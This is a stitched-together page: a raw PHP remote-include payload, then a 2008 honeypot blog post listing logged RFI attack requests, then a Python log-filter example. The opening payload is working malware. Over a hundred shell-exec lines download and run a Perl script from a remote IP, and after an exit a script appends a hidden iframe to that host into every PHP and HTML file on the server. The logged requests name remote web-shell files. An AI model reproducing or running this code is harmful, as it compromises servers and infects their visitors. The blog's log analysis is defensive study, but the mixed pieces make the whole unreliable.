@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
?>
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "AnakDompu<br />";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "AnakDompu Was Here!!<br />";
echo "uname -a: $un<br />";
echo "os: $os<br />";
echo "uptime: $up<br />";
echo "id: $id1<br />";
echo "pwd: $pwd1<br />";
echo "php: $php1<br />";
echo "software: $sof1<br />";
echo "server-name: $name1<br />";
echo "server-ip: $ip1<br />";
echo "free: $free<br />";
echo "used: $used<br />";
echo "total: $all<br />";
exit;
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src="http://203.113.6.34/adu/home.html"
width="0" height="0" frameborder="0"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>
Tuesday, June 17. 2008
[honeyd] RFI bots?
I am currently writing a few filter scripts to evaluate the honeyd logs.
This is a sample result from a script that simply filters for 'GET' and '=http' and 'not honey_domain' and 'not Referer':
CODE:
"GET /test.php?page=http://www.webhostmedic.com/p.c? HTTP/1.1
"GET //errors.php?error=http://www.bbs-bad-harzburg.de/contenido//contenido/includes/sistem.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://nozyk.org/rob.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/31337.txt?? HTTP/1.1
"GET /?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET /contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc/contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /doc/about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
Some people should really fix their scripts ;)
The corresponding files on www.joerg-krug.de have already been removed. I have not tried the others. Have fun. :)
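The filter described in this post ('GET', '=http', not honey_domain, not Referer), as an added Python example that is not the author's own script; it goes one step further and counts hits per request parameter and per remote host. The honeypot domain and the sample log lines are constructed assumptions modelled on the listing above.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

HONEY_DOMAIN = "honeypot.example"  # assumption: stands in for the post's honey_domain

REQUEST = re.compile(r'^"?GET\s+(\S+)\s+HTTP/\d\.\d')  # leading quote is optional in the log
PARAM_URL = re.compile(r"[?&]([^=&\s]+)=(https?://[^&\s]+)", re.IGNORECASE)

# Constructed sample lines in the shape of the listing above; all hosts are made up.
SAMPLE = [
    '"GET /doc/index.php?option=com_custompages&cpage=http://files.compromised.example/admin/r57.txt? HTTP/1.1',
    '"GET //index.php?option=com_custompages&cpage=http://files.compromised.example/admin/r57.txt? HTTP/1.1',
    '"GET //errors.php?error=http://other.example/images/id.txt? HTTP/1.1',
    'GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://other.example/db/test.txt??? HTTP/1.1',
    '"GET /redirect.php?to=http://www.honeypot.example/start.html HTTP/1.1',
    '"GET /out.php?u=http://other.example/a.txt HTTP/1.1" Referer: http://search.example/',
    '"POST /login.php?next=http://other.example/x HTTP/1.1',
]


def rfi_hits(lines, honey_domain=HONEY_DOMAIN):
    """Yield (path, parameter, remote_host, remote_url) per remote-include attempt."""
    for line in lines:
        line = line.strip()
        if "Referer" in line:  # 'not Referer'
            continue
        m = REQUEST.match(line)  # 'GET'
        if not m:
            continue
        target = m.group(1)
        path = target.split("?", 1)[0]
        for name, url in PARAM_URL.findall(target):  # '=http'
            url = url.rstrip("?")  # drop the trailing '?' padding seen in the listing
            host = (urlsplit(url).hostname or "").lower()
            if host == honey_domain or host.endswith("." + honey_domain):
                continue  # 'not honey_domain'
            yield path, name, host, url


def summarize(lines, honey_domain=HONEY_DOMAIN):
    """Count hits per request parameter and per remote host, and list unique URLs."""
    hits = list(rfi_hits(lines, honey_domain))
    return {
        "params": Counter(name for _, name, _, _ in hits),
        "hosts": Counter(host for _, _, host, _ in hits),
        "urls": sorted({url for *_, url in hits}),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE)
    for name, count in report["params"].most_common():
        print(f"{count:3d}  {name}")
    for url in report["urls"]:
        print(url)
```

The per-parameter counts show which include parameters the scanners probe most, and the unique URL list is the set of response files to report to the hosting sites.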
